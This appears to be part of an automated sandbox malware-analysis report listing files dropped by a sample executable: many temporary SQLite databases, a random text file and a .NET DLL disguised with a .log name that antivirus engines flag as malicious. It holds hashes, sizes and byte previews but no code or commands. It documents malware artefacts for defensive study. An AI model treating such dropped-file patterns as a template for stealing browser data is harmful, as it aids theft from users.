                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\x0k4lNz6pn

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\xHfETeDy1o

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\xRW3LRoa3F

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\xUBZTTDyEk

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\xkZTpmNj0f

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\xkudhaYODL

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\xr0HFXB5ze

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\xuGLskVJOX

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\xzQnYTV2OA

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\y3nJoRN2ZZ

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\yAQHb07fcL

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\yLPztfZz85

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.3909341910495931
                                                                    Encrypted:false
                                                                    SSDEEP:48:ToyFawNLopFgU10XJBjKwsBjAFMtt/qEM0g9gingQeroAsaC7cUXt9P:cyxe8OwsiFMttSzefroYC7J9P
                                                                    MD5:1EB30D95ED94CA01369986C3811A0591
                                                                    SHA1:D7277FF6C5D5F55A4B0576045C2928D7501E7AFC
                                                                    SHA-256:CA8D4F98E4AD0ED1F66819E90024EB527A7A46DC26D84FB9FF5F1829B6331F46
                                                                    SHA-512:D5C8BA028977ABA2416D2C02D50FD2535F646003D8F443A01E00C6FC9385F16A6C051502D3947CABF592C619E3E0A22EC586AD57876E517C7B5BB749D396ABA7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\yPllNMmRUO

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\ydCSYdvqtI

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\ysmNSNMNPI

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\zAVFgJowtg

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\zMJL4Gcqzf

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\zaJ1ZQTUsR

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\zeixA3OO30

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.848598812124929
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                    MD5:9664DAA86F8917816B588C715D97BE07
                                                                    SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                    SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                    SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\zerMA7HD3L

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\zmMWPVm7fH

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\16d6a1367e9ae4

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):179
                                                                    Entropy (8bit):5.672043643888927
                                                                    Encrypted:false
                                                                    SSDEEP:3:Ni81UbkqhqHRdhmLVJ98bLfY//BnfSKbbH0JpiNqoLSQxqUGJmDnerWk+Zn:Ni81gkayRTmLjq6BnfSKnGTfJmDeakYn
                                                                    MD5:93C4920E840B62339D0B767D35B68CC4
                                                                    SHA1:180EAB4153B0E930D7370CDC8B038053BDE444E0
                                                                    SHA-256:1973030EF21788A2D3A3347D290EFC3F10760DE9CC644CA90CED2EE68DC264CE
                                                                    SHA-512:E54A23437CA29F083F8ED975B7657B79CA081231F912FD1780A09C72EB789B9CA0A2C8EA0EBF1B1CE1F57F857BB24765324108410AB45415AA464775FE86D7B9
                                                                    Malicious:false
                                                                    Preview:OzaGqoADr2p1MXXazp15SGAODXYPcu4xTjJCnMdX7E06KSokG8V4Hp2IyLCTQuk681imNUwnMe8OPEEvsyJdYApnrBNcKJHMd37StCWvMsrnrn2uGQlblGh8L45MGUdCWwuWGvCqcXRqSC6DJdV3iplWW9HzGJp1OpQ53foVO49Oz0qJ71D

                                                                    C:\Users\user\Desktop\DVfmUYdt.log

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):85504
                                                                    Entropy (8bit):5.8769270258874755
                                                                    Encrypted:false
                                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                    Joe Sandbox View:
                                                                    • Filename: K61NUunFJv.exe, Detection: malicious, Browse
                                                                    • Filename: NFnZNaiEGC.exe, Detection: malicious, Browse
                                                                    • Filename: PCf6uF6Pp0.exe, Detection: malicious, Browse
                                                                    • Filename: 4fmxsamrPG.exe, Detection: malicious, Browse
                                                                    • Filename: 4QXC0LSV8t.exe, Detection: malicious, Browse
